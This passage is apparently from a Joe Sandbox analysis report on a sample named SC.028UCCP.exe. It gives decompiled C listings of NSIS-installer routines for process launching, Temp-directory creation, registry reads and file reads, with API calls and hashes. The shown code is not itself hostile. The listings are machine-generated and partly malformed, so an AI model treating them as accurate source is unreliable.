                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 6c28c937d32deeee8c4a4a7d7415759edd1eb229d143a9345964d33634643e2f
                                  • Instruction ID: 15cec7ad730383037ace73de1cf566d9f400779eaaed3c89d674d6bcdef9eb11
                                  • Opcode Fuzzy Hash: 6c28c937d32deeee8c4a4a7d7415759edd1eb229d143a9345964d33634643e2f
                                  • Instruction Fuzzy Hash: 20015EB1100208AFDF215F11DC85A9B3A2AF7D4765F50413AFF04762D1C37A9C91DBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405368 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405368(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42b828->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42b828,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                  0x00405371
                                  0x0040538d
                                  0x00405395
                                  0x0040539a
                                  0x00000000
                                  0x004053a0
                                  0x004053a4

                                  APIs
                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B828,Error launching installer), ref: 0040538D
                                  • CloseHandle.KERNEL32(?), ref: 0040539A
                                  Strings
                                  • Error launching installer, xrefs: 0040537B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: b3998ada7a220c47db69c0c22e20a9525334f7800375aa12388a5f4127d2dad1
                                  • Instruction ID: 8a6f12bc318ec6a69002769553d16d4b3f873146e0ffdb4928c8eb689fb6cc4d
                                  • Opcode Fuzzy Hash: b3998ada7a220c47db69c0c22e20a9525334f7800375aa12388a5f4127d2dad1
                                  • Instruction Fuzzy Hash: 86E0ECB4A00209ABDB00AF64EC09A6B7BBCEB04344F408531E914E2150E778E9109AA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E004030D7(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405E03(_t6);
				_t2 = E004056B2(_t6);
				if(_t2 != 0) {
					E00405645(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405875("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                  0x004030d8
                                  0x004030de
                                  0x004030e4
                                  0x004030eb
                                  0x004030f0
                                  0x004030f8
                                  0x00403104
                                  0x0040310a
                                  0x004030ee
                                  0x004030ee
                                  0x004030ee

                                  APIs
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E5B
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E6D
                                    • Part of subcall function 00405E03: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E7D
                                  • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 004030F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Char$Next$CreateDirectoryPrev
                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 4115351271-1075807775
                                  • Opcode ID: d7628b9f20a1b5c325ff348988f8c285fe8ae7ec7af24a77171c77d708be0feb
                                  • Instruction ID: fd0f6b97774aff97ce55239a91fc0964d985d8a64bd9372f8197c1aef795e8ac
                                  • Opcode Fuzzy Hash: d7628b9f20a1b5c325ff348988f8c285fe8ae7ec7af24a77171c77d708be0feb
                                  • Instruction Fuzzy Hash: 18D05222506C3022E15133267C16FCF060C8F4A31AF919077F408710824A2E4A8208FE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401B11 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E00401B11(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
				_t30 =  *0x40afc4; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E00405BBA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
						_t11 =  *0x40afc4; // 0x0
						 *_t34 = _t11;
						 *0x40afc4 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00405B98(_t33, _t2);
							_push(_t30);
							 *0x40afc4 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E00405B98(0x409bc0, _t30 + 4);
								_t21 =  *0x40afc4; // 0x0
								E00405B98(_t32, _t21 + 4);
								_t24 =  *0x40afc4; // 0x0
								_push(0x409bc0);
								_push(_t24 + 4);
								E00405B98();
								L15:
								 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00405BBA(_t27, _t30, _t33, _t27, 0xffffffe8));
					E004053C9();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}













                                  0x00401b11
                                  0x00401b11
                                  0x00401b14
                                  0x00401b1c
                                  0x00401b64
                                  0x00401b92
                                  0x00401b9b
                                  0x00401b9d
                                  0x00401ba1
                                  0x00401ba6
                                  0x00401bab
                                  0x00401bad
                                  0x00401b66
                                  0x00401b68
                                  0x0040266d
                                  0x00401b6e
                                  0x00401b6e
                                  0x00401b73
                                  0x00401b7a
                                  0x00401b7b
                                  0x00401b80
                                  0x00401b80
                                  0x00401b68
                                  0x00000000
                                  0x00401b1e
                                  0x00401b1e
                                  0x00401b1e
                                  0x00401b21
                                  0x00000000
                                  0x00000000
                                  0x00401b27
                                  0x00401b2b
                                  0x00000000
                                  0x00401b2d
                                  0x00401b2f
                                  0x00000000
                                  0x00401b35
                                  0x00401b35
                                  0x00401b3f
                                  0x00401b44
                                  0x00401b4e
                                  0x00401b53
                                  0x00401b58
                                  0x00401b5c
                                  0x004027c2
                                  0x0040289c
                                  0x0040289f
                                  0x004028a5
                                  0x004028a5
                                  0x00401b2f
                                  0x00000000
                                  0x00401b2b
                                  0x00402211
                                  0x0040221e
                                  0x0040221f
                                  0x00402224
                                  0x00402224
                                  0x004028a7
                                  0x004028ab

                                  APIs
                                  • GlobalFree.KERNEL32 ref: 00401B80
                                  • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree
                                  • String ID: Call
                                  • API String ID: 3394109436-1824292864
                                  • Opcode ID: a58bceada041626c77a9415b2187daccc7872390f28df3146622465e37d553ae
                                  • Instruction ID: bfdb79625eb78255327a415742f54a265397f278bf875e9f7b12c7fb5acb2754
                                  • Opcode Fuzzy Hash: a58bceada041626c77a9415b2187daccc7872390f28df3146622465e37d553ae
                                  • Instruction Fuzzy Hash: DA21C0B2A00201ABD710ABA5DF88D5F73B5EB49314724057BF501F32D2D6BCB8118B1E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00401E32() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A07(_t24);
				E00404EA5(0xffffffeb, _t13);
				_t15 = E00405368(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405EFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 8);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 8) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405AF6(_t26,  *(_t31 - 8));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                  0x00401e38
                                  0x00401e3d
                                  0x00401e43
                                  0x00401e4a
                                  0x00401e4d
                                  0x0040266d
                                  0x00401e53
                                  0x00401e56
                                  0x00401e67
                                  0x00401e62
                                  0x00401e62
                                  0x00401e7c
                                  0x00401e85
                                  0x00401e95
                                  0x00401e97
                                  0x00401e97
                                  0x00401e87
                                  0x00401e8b
                                  0x00401e8b
                                  0x00401e85
                                  0x00401e9e
                                  0x00401ea1
                                  0x00401ea1
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                    • Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                    • Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F39
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F53
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F61
                                    • Part of subcall function 00405368: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B828,Error launching installer), ref: 0040538D
                                    • Part of subcall function 00405368: CloseHandle.KERNEL32(?), ref: 0040539A
                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                  • GetExitCodeProcess.KERNEL32 ref: 00401E7C
                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                  • String ID:
                                  • API String ID: 3521207402-0
                                  • Opcode ID: d7504f88e5ee259c9d8fcc88f305a0f970c784f62c979d876af5dfa2b13a1e46
                                  • Instruction ID: 47b0888271ef8fef87928745203e2db848c347203f0d50bde1ae1afdf34c4489
                                  • Opcode Fuzzy Hash: d7504f88e5ee259c9d8fcc88f305a0f970c784f62c979d876af5dfa2b13a1e46
                                  • Instruction Fuzzy Hash: BE018031A04219EBDF10AFA1CD859AE7B71EB00344F20857BF601B51E1C7B95A81EF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A7F Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00405A7F(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x400;
					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}







                                  0x00405a8f
                                  0x00405a91
                                  0x00405a9e
                                  0x00405aa8
                                  0x00405ab0
                                  0x00405ab5
                                  0x00405ac9
                                  0x00405ad1
                                  0x00405adf
                                  0x00405adf
                                  0x00405ae4
                                  0x00405aea
                                  0x00000000
                                  0x00405aea
                                  0x00405af3

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,00405CC4,00000000,00000002,?,00000002,0017CE51,?,00405CC4,80000002,Software\Microsoft\Windows\CurrentVersion,0017CE51,Call,005ABA29), ref: 00405AA8
                                  • RegQueryValueExA.KERNELBASE(0017CE51,?,00000000,00405CC4,0017CE51,00405CC4), ref: 00405AC9
                                  • RegCloseKey.KERNELBASE(?), ref: 00405AEA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                  • Instruction ID: 71ae70624bec2c47f0bbb1bb8334a3f1983087d908a17f43c3698e5adb36173d
                                  • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                  • Instruction Fuzzy Hash: 4E01487114020AEFDF128F64EC88AEB3FACEF14358F004126F906A6220D235D964DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402438 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00402438(int* __ebx, char* __esi) {
				void* _t7;
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				char* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t7 = E00402B11(_t25, 0x20019); // executed
				_t18 = _t7;
				_t8 = E004029EA(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x14)) == __ebx) {
						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18);
						RegCloseKey();
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}











                                  0x00402438
                                  0x00402438
                                  0x0040243d
                                  0x00402444
                                  0x00402446
                                  0x0040244d
                                  0x0040244f
                                  0x0040266d
                                  0x0040266d
                                  0x00402455
                                  0x0040245d
                                  0x00402460
                                  0x00402479
                                  0x0040247f
                                  0x00402481
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402462
                                  0x00402466
                                  0x00402487
                                  0x00402487
                                  0x0040248d
                                  0x0040248e
                                  0x0040248e
                                  0x00402460
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                    • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402479
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Enum$CloseOpenValue
                                  • String ID:
                                  • API String ID: 167947723-0
                                  • Opcode ID: 4e936370a045a5093ba77e57e34387299b70895795c41cc5222d621ec4f5c703
                                  • Instruction ID: e1b674d6fa50b79099c3a4ad1b77673b9663613076e8f513ce388d427edaab02
                                  • Opcode Fuzzy Hash: 4e936370a045a5093ba77e57e34387299b70895795c41cc5222d621ec4f5c703
                                  • Instruction Fuzzy Hash: 1FF0FF72A04204EFEB119F699E8CEBF7A6CEF40348F10483FF005B61C0D6B95E41962A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1000279C Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 16%
                                  			E1000279C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004040 != 0 && E1000271E(_a4) == 0) {
					 *0x10004044 = _t106;
					if( *0x1000403c != 0) {
						_t106 =  *0x1000403c;
					} else {
						E10002CE0(E10002718(), __ecx);
						 *0x1000403c = _t106;
					}
				}
				_t31 = E1000275A(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E1000274E();
					_t81 = _a4;
					_t90 =  *0x10004048;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004048 = _t81;
					E10002748();
					_t36 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x1000401c = _t36;
					 *0x10004020 = _t90;
					if( *0x10004040 != 0 && E1000271E( *0x10004048) == 0) {
						 *0x1000403c = _t107;
						_t107 =  *0x10004044;
					}
					_t91 =  *0x10004048;
					_a4 = _t91;
					 *0x10004048 =  *((intOrPtr*)(E1000274E() + _t91));
					_t40 = E1000272C(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000275A(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E10002765() + _a4 + _v8);
							_push(E1000276F());
							if( *0x10004040 <= 0 || E1000271E(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004048 == 0) {
						 *0x1000403c = 0;
					}
					_t94 = _a4 + E10002765();
					 *(E10002773() + _t94) =  *0x1000401c;
					 *((intOrPtr*)(E10002777() + _t94)) =  *0x10004020;
					E10002787(_a4);
					if(E1000273A() != 0) {
						 *0x10004058 = GetLastError();
					}
					return _a4;
				}
				_push(E10002765() + _a4);
				_t65 = E1000276B();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E10002777();
				_t100 = E10002773();
				_t103 = E1000276F();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}


























                                  0x100027ac
                                  0x100027bd
                                  0x100027ca
                                  0x100027de
                                  0x100027cc
                                  0x100027d1
                                  0x100027d6
                                  0x100027d6
                                  0x100027ca
                                  0x100027e7
                                  0x100027ec
                                  0x100027f2
                                  0x10002836
                                  0x10002836
                                  0x1000283b
                                  0x10002840
                                  0x10002846
                                  0x10002848
                                  0x1000284e
                                  0x1000285b
                                  0x1000285d
                                  0x10002862
                                  0x1000286f
                                  0x10002882
                                  0x10002888
                                  0x1000288e
                                  0x1000288f
                                  0x10002895
                                  0x100028a1
                                  0x100028a7
                                  0x100028af
                                  0x100028b0
                                  0x100028b3
                                  0x100028be
                                  0x100028c0
                                  0x100028cc
                                  0x100028d2
                                  0x100028da
                                  0x10002906
                                  0x10002907
                                  0x1000290d
                                  0x1000290d
                                  0x10002914
                                  0x100028ea
                                  0x100028ea
                                  0x100028eb
                                  0x100028f9
                                  0x10002902
                                  0x10002902
                                  0x100028da
                                  0x100028be
                                  0x1000291d
                                  0x1000291f
                                  0x1000291f
                                  0x10002931
                                  0x1000293e
                                  0x1000294c
                                  0x10002952
                                  0x10002960
                                  0x10002968
                                  0x10002968
                                  0x10002976
                                  0x10002976
                                  0x100027fd
                                  0x100027fe
                                  0x10002803
                                  0x10002807
                                  0x1000280c
                                  0x10002820
                                  0x10002821
                                  0x10002822
                                  0x10002824
                                  0x10002829
                                  0x1000282b
                                  0x1000282b
                                  0x1000282e
                                  0x10002834
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastRead
                                  • String ID:
                                  • API String ID: 1948546556-0
                                  • Opcode ID: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                  • Instruction ID: bd365418521e43e453085722f926cc1c0e2ab3e4cffdaddced3e06c5c0338b71
                                  • Opcode Fuzzy Hash: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                  • Instruction Fuzzy Hash: D951A5BA808215DFFB24DF64DCC675937A8EB443D4F22842AE608E722DDF34A950CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402517 Relevance: 3.1, APIs: 2, Instructions: 79fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402517(intOrPtr __ebx, void* __edi, void* __esi) {
				intOrPtr _t28;
				void* _t37;
				void* _t40;

				 *((intOrPtr*)(_t37 - 0x30)) = __ebx;
				_t28 = E004029EA(2);
				_t40 = _t28 - 1;
				 *((intOrPtr*)(_t37 - 0x34)) = _t28;
				if(_t40 < 0) {
					L25:
					 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
				} else {
					__ecx = 0x3ff;
